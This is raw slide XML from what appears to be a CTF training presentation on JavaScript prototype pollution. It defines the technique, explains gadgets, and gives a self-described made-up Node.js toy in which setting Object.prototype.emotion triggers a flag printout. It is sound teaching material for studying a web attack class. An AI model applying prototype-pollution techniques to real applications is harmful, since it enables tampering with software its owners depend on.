          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2102487" y="2913342"/>
              <a:ext cx="1219200" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D43AC7-C441-33D2-DC94-6CC13B12AA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5466129" y="1173837"/>
            <a:ext cx="3562758" cy="3729901"/>
            <a:chOff x="5466129" y="1173837"/>
            <a:chExt cx="3562758" cy="3729901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7314F6C-B1D2-8055-7308-39F8B57407B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5466129" y="1173837"/>
              <a:ext cx="3493367" cy="3493367"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC58F85-199B-DFB0-0358-F755995D770B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5535520" y="4595961"/>
              <a:ext cx="3493367"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.prototype.hand</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"knife"</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2682802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5B975-057B-163A-C941-997F06ADC410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Prototype pollution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B198F7D0-C3C9-F9E8-E73A-EF1E6C3B615E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We have just demonstrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>prototype pollution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Prototype pollution is simply modifying some object that is commonly part of the prototype chains of other objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The effect is that we indirectly affect all other objects, including newly created objects, that has said object in their prototype chains</a:t>
            </a:r>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58750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Did you expect something here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9FFA2AB-3918-B1EC-99DC-ECE5135F6D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6" name="Picture 5" descr="A cat with white lights&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BAC0EC1-EA94-23CD-9FEC-B34B01315A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107152" y="4135212"/>
            <a:ext cx="1229275" cy="1229275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1640165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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The end…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="Google Shape;751;p92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="e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408903-5689-4816-B2EB-725F7CD7F467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>So… how do I use prototype pollution in CTFs?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9FFA2AB-3918-B1EC-99DC-ECE5135F6D01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr lvl="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A yellow cat with question marks&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48022183-316B-7B0B-745F-9DC53A684806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157498" y="1157248"/>
            <a:ext cx="2829004" cy="2829004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461988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A9F88-4835-F474-F399-0B10976BA746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The why and the how</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E1C242F-891E-619E-3B02-CD8ACCE756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4" name="Picture 3" descr="A yellow cat with question marks&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8D4C48-7D34-ABAE-2CAD-A2EF4B4259BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="20000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157498" y="1157248"/>
            <a:ext cx="2829004" cy="2829004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37420268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B48B-AADA-AD79-379B-815AF3DB100E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The why</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CF1459-E977-8D32-CFF0-CB8B37AA3267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>You want an object to have a certain property with a certain value to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>trigger something (gadget)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, but you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>cannot directly manipulate the object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The object itself must not have the property, or it shadows the property on the prototype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>A very toy example that I made up (probably does not exist in any challenge or production server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make_me_angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ // No inputs to manipulate.</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const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {}</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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.emotion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> === </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// We want this condition to be true.</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console.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"flag{:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcatangery</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make_me_angery</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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.prototype.emotion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a: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angery</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, we can’t do this directly. I’ll explain later.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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angery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>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make_me_angery</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flag{:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcatangery</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endParaRPr lang="zh-HK" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978FBF8F-BE6C-15F3-ED7A-51A2773D5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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99B6EE8-D08C-3B21-3E2F-E430E4D2B0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5812768" y="3370969"/>
            <a:ext cx="3299703" cy="1670456"/>
            <a:chOff x="5812768" y="3370969"/>
            <a:chExt cx="3299703" cy="1670456"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2BF373D-2480-C25E-BCCB-2877001ACAF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8370622" y="3720540"/>
              <a:ext cx="741849" cy="741849"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 17">
              <a:extLst>
